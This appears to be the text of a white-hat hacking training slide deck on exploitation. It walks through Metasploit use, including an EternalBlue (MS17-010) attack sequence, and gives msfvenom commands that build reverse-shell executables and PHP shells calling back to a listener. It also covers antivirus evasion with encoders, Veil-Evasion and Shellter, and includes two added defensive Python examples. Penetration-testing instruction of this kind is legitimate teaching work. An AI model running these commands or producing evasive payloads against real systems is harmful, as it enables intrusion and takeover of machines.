www.prismacsi.com
© All Rights Reserved.
1
Practical White Hat Hacker Training #5
Exploitation
This document may be quoted or shared, but cannot be modified or used for commercial purposes.
For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
Exploit Stage Topics
• What is an exploit?
• Types of exploits
• Local, remote and 0day exploits
• Exploit Databases
• Example Exploit Scenarios
• Exploit Execution and Usage Scenarios
• Exploit Frameworks
• Payload Concept
• Metasploit Framework
• Antivirus Evasion Software
• Veil-Evasion
• Shellter
• Application
Basic Concepts
• What’s an exploit?
• The name given to tools developed to exploit a vulnerability.
• Also called exploitation code.
• Local Exploit
• Remote Exploit
• Web Exploit
• DoS Exploit
• 0day Exploit
• What’s a Payload?
• A piece of malicious code that performs a given desired action after an exploit
Exploit Databases
• A repository holding a massive number of exploits. Exploits for discovered/detected software and services can be searched for in these databases.
• Exploit-db.com
• Securityfocus.com
• 0day.today
• Exploits.shodan.io
• Iedb.ir
• Cxsecurity.com/exploit
• Rapid7.com/db
Exploit Development Languages
• In which programming languages are exploits generally written?
• Python
• C / C++
• Perl
• PHP
• Ruby
• Why was the Framework concept conceived?
• Metasploit Framework example
Exploit Execution / Use - Demo
Exploit Editing
• Exploits don’t execute on every system.
• Parameters may vary according to features such as operating system, processor architecture and system language.
• In this case you may need to edit the exploit and then execute it afterwards.
• Replicas of the target system can be created in a laboratory environment for experiments.
• Assume you only have one chance to attack!
• A system crash may be the end of everything.
Exploit Example - Scenario
• Consider a bank’s credit calculation area!
• Where is the calculation performed? ( Server? Client? )
• What if we perform the request specified in the scenario thousands of times within a minute?
• This is an example of a simple DoS Exploit :)
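A defender-side illustration of the scenario above, added here and not part of the original slides: the detector reads constructed web-server log lines (Apache combined format; the endpoint path /loan/calculate, the client addresses and the thresholds are assumptions) and flags any client whose request rate against the calculation endpoint exceeds a threshold inside a sliding window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, datetime, method, path), or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), m.group("method"), m.group("path")


def max_requests_in_window(timestamps, window):
    """Largest number of events that fall inside any sliding window of length `window`."""
    ts = sorted(timestamps)
    best = start = 0
    for end in range(len(ts)):
        while ts[end] - ts[start] > window:   # slide the left edge forward
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bursts(lines, path_prefix, window_s=60, threshold=1000):
    """Peak per-client request count against `path_prefix` in any `window_s` seconds,
    keeping only clients at or above `threshold` (the slide's "thousands per minute")."""
    per_ip = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                          # malformed line: skip, do not crash the detector
        ip, ts, _method, path = parsed
        if path.startswith(path_prefix):
            per_ip[ip].append(ts)
    window = timedelta(seconds=window_s)
    peaks = {ip: max_requests_in_window(t, window) for ip, t in per_ip.items()}
    return {ip: n for ip, n in peaks.items() if n >= threshold}


def sample_log():
    """Constructed sample (assumed paths and addresses): 40 POSTs from one client within
    20 seconds against the calculation endpoint, a little normal traffic, one unrelated
    request and one unparseable line."""
    base = datetime.strptime("10/Oct/2023:13:55:00 +0000", TS_FMT)
    fmt = '{ip} - - [{ts}] "POST /loan/calculate HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
    lines = [fmt.format(ip="203.0.113.9", ts=(base + timedelta(seconds=i // 2)).strftime(TS_FMT))
             for i in range(40)]
    for i, ip in enumerate(["198.51.100.4", "198.51.100.7", "198.51.100.4"]):
        lines.append(fmt.format(ip=ip, ts=(base + timedelta(seconds=5 * i)).strftime(TS_FMT)))
    lines.append('198.51.100.4 - - [10/Oct/2023:13:55:30 +0000] '
                 '"GET /index.html HTTP/1.1" 200 1024 "-" "curl/8.0"')
    lines.append("garbage line that does not parse")
    return lines


if __name__ == "__main__":
    # A low threshold so the constructed sample trips the alert.
    for ip, n in detect_bursts(sample_log(), "/loan/calculate", window_s=60, threshold=30).items():
        print(f"ALERT {ip}: {n} calculation requests inside 60s")
```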
Exploit Frameworks
• Metasploit Community
• Metasploit Pro
• Core Impact
• Exploithub
• BeEF
Metasploit Framework
• Metasploit Framework
• Installation
• Basic Commands
• Auxiliary modules
• Exploit use
• Payload list and Meterpreter use
• Output analysis
• Post Exploitation
Metasploit Framework
• It’s open source software.
• A Pro version is available, but the community version will be sufficient for this course.
• Exploits
• Payloads
• Auxiliary modules
• Encoders
• Post exploits
Metasploit Framework
• Visit the link below for installation instructions:
• https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
• Update:
• msfupdate
Metasploit Framework
Metasploit Framework
• Start
• Begin by typing msfconsole in the command line.
• You can check the database status with the following command:
• db_status
Metasploit Framework
• Workspace concept
• Use the workspace command to list all the available workspaces.
• workspace -a prisma creates a prisma workspace.
• workspace prisma switches to the prisma workspace.
• workspace -d prisma deletes the prisma workspace.
Metasploit Framework
Metasploit Framework
• Working with Nessus and Nmap outputs
You can import the output of scanning software into Metasploit. This is one of the best features of the Metasploit Framework.
• db_import nmap.xml imports Nmap output.
• db_import nessus-report.nessus imports Nessus output.
• db_export -f xml /tmp/prisma.xml exports the data in your workspace.
Metasploit Framework
Metasploit Framework
Metasploit Framework
• Workspace data:
• hosts
• services
• creds
• loots
Metasploit Framework
• Hosts command
• db_nmap -sS -Pn -n 10.0.1.0/24
You can perform Nmap scans with this command. The hosts command can then be used to view all IP addresses discovered from its output.
• hosts -h
Lists all functions of the hosts command.
• hosts -R
Used to add the listed addresses to the RHOST parameter.
Metasploit Framework
Metasploit Framework
• Services command
• db_nmap -sS -Pn -n 10.0.1.0/24 -sV
Used to execute an Nmap scan. After this command completes, you can view the ports on all IP addresses and the services running on them with the services command.
• services -h
Lists all functions of the services command.
• services -p 445
• services -S http
• services -p 80 -R
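An added example serving both the hosts and services slides above; it is not part of the original deck or of the Metasploit code base. It parses a constructed Nmap XML report of the kind db_import nmap.xml consumes and reproduces the filtering the slides describe (services -p 445, services -S http, and the host list that -R hands to the RHOSTS option). The XML, the hosts and the services are constructed; the filter semantics are an approximation of Metasploit's, not its code.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap XML (not a real scan): three hosts, six port entries, one of them closed.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -Pn -n -sV 10.0.1.0/24">
  <host><status state="up"/><address addr="10.0.1.5" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="445"><state state="open"/>
      <service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/></port>
    <port protocol="tcp" portid="80"><state state="open"/>
      <service name="http" product="Microsoft IIS httpd" version="7.5"/></port>
  </ports></host>
  <host><status state="up"/><address addr="10.0.1.7" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="22"><state state="open"/>
      <service name="ssh" product="OpenSSH" version="7.4"/></port>
    <port protocol="tcp" portid="445"><state state="open"/>
      <service name="microsoft-ds" product="Samba smbd" version="4.x"/></port>
  </ports></host>
  <host><status state="up"/><address addr="10.0.1.9" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="445"><state state="closed"/><service name="microsoft-ds"/></port>
    <port protocol="tcp" portid="8080"><state state="open"/>
      <service name="http" product="Apache Tomcat" version="8.5"/></port>
  </ports></host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Flatten an Nmap report into one row per (host, port): the columns Metasploit's
    services table shows after db_import nmap.xml."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            svc = port.find("service")
            info = [svc.get(k) for k in ("product", "version", "extrainfo")] if svc is not None else []
            rows.append({
                "host": addr.get("addr"),
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "name": svc.get("name", "") if svc is not None else "",
                "info": " ".join(p for p in info if p),
            })
    return rows


def services(rows, port=None, search=None, state="open"):
    """Approximation of services -p PORT / services -S TEXT: keep rows matching the port,
    a case-insensitive substring of the name/info columns, and the port state."""
    out = []
    for r in rows:
        if state is not None and r["state"] != state:
            continue
        if port is not None and r["port"] != port:
            continue
        if search and search.lower() not in (r["name"] + " " + r["info"]).lower():
            continue
        out.append(r)
    return out


def rhosts(rows):
    """Unique hosts of the selected rows in address order: what -R hands to RHOSTS."""
    return sorted({r["host"] for r in rows}, key=lambda ip: tuple(int(o) for o in ip.split(".")))


def format_table(rows):
    """Render rows as a services-style table (layout is this example's own)."""
    lines = ["host          port  proto name          state   info"]
    for r in rows:
        lines.append("%-12s %5d  %-5s %-13s %-7s %s" % (
            r["host"], r["port"], r["proto"], r["name"], r["state"], r["info"]))
    return "\n".join(lines)


if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(format_table(services(rows, port=445)))              # services -p 445
    print(format_table(services(rows, search="http")))         # services -S http
    print("RHOSTS", " ".join(rhosts(services(rows, port=80))))  # services -p 80 -R
```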
Metasploit Framework
Metasploit Basic Command List
• help
• Help command
• banner
• Allows you to take awesome screenshots :)
• info
• Get information on any plugin
• info exploit/windows/smb/psexec
• search
• Search command
• search ms17-010
Metasploit Basic Command List
• use
• Select an exploit
• use exploit/windows/smb/psexec
• set
• Exploit
• info
• Acquire information on any plugin
• info exploit/windows/smb/psexec
• search
• Search command
• search ms17-010
Metasploit Framework - Help
Metasploit Framework - Banner
Metasploit Framework - Info
Metasploit Basic Command List
• set
• Used to assign values to a parameter.
• set RHOST 10.0.1.5
• setg
• Used to assign a parameter value as global.
• unset
• Used to reset parameter values.
• show
• Show names :)
• use
• Activates a plugin.
Metasploit Basic Command List
• run and exploit
• Used to run a plugin.
• load and unload
• Used to activate or deactivate a module.
• exit
• Exiting command
Metasploit Show Command
• show payloads
• List Payloads
• show targets
• List operating systems suitable for attacks with a given plugin
• show options
• Show setting parameters for a plugin
• show encoders
• List all encoders
Auxiliary Modules and Use
• show auxiliary
• search smb_login
• use auxiliary/dos/windows/rdp/ms12_020
• set RHOST
• set RPORT
• run
Exploit Attempt (MS17-010)
• search netapi
• info exploit/windows/smb/ms17_010_eternalblue
• use exploit/windows/smb/ms17_010_eternalblue
• show options
• set payload windows/meterpreter/bind_tcp
• set LHOST
• set RHOST
• set RPORT
• exploit
Payload Examples
• set PAYLOAD windows/meterpreter/reverse_http
• set PAYLOAD windows/shell/bind_tcp
• set PAYLOAD linux/x86/meterpreter/reverse_https
• set PAYLOAD php/meterpreter/bind_tcp
• set PAYLOAD java/meterpreter/bind_tcp
• set PAYLOAD windows/vncinject/reverse_tcp
Reverse/Bind Shell
Session Management
• exploit/multi/handler
• Can be used as a listener.
• Listener can be run as a job to get connections from multiple targets.
• jobs:
• exploit -j
• The jobs command is used for listing jobs.
Session Management
• You can manage all sessions obtained with the sessions command.
• sessions -l : list sessions
• sessions -i 1 : interact with session 1
• sessions -K : end all sessions
• sessions -u : upgrade a session to a Meterpreter session
• kill : used to kill a session.
• background : takes the session into the background and returns to the Metasploit console.
Exploit Search
• Searchsploit
What’s Msfvenom?
• There may be no direct vulnerability in the target system.
• In this case, it may be necessary to try to penetrate the system in different ways.
• For example, if a crafted malicious .exe file is somehow uploaded and executed on a system, the system can be captured.
• Or you might want to upload a malicious shell written in PHP to a web application with a file upload vulnerability and get a terminal connection in Metasploit.
• That's where msfvenom comes into play!
Msfvenom Use
• Msfvenom basic commands
• msfvenom -h
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -f exe > shell.exe
• msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f raw > exp.php
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
Msfvenom AV Evasion - Demonstration
• msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
Msfvenom Help
Msfvenom PHP Payload Contents
Download Metasploit Additional Plugins
• https://github.com/darkoperator/Metasploit-Plugins
Loading Metasploit Features
• Files are added manually under ~/.msf4/plugin/
Armitage Use
• Metasploit Framework GUI
• Used to perform actions quickly
• The interface is a little easier to use compared to the console application
Armitage Use
• Adding a host
Armitage Use
• Host scanning
Armitage Use
• Scan Results
Armitage Use
• Finding an attack vector
Armitage Use
• Java_rmi_attack
Armitage Use
• Java_rmi_attack
• Meterpreter session
Antivirus Evasion Tools
• An antivirus mechanism may be found in target systems.
• In this case the attacks should be performed with much more caution.
• There are tools developed to bypass antiviruses.
• Used tools
• Veil-Evasion
• Shellter
• Av0id
• Msfvenom
Veil-Evasion Installation
Veil-Evasion Payload Selection
Veil-Evasion Payload Configuration
Veil-Evasion Payload Creation - DEMO
Virustotal Scanning
Shellter Installation
Shellter Use – DEMO
Virustotal Scanning
Applications
Questions?
www.prismacsi.com
info@prismacsi.com
0 850 303 85 35
/prismacsi
Contacts
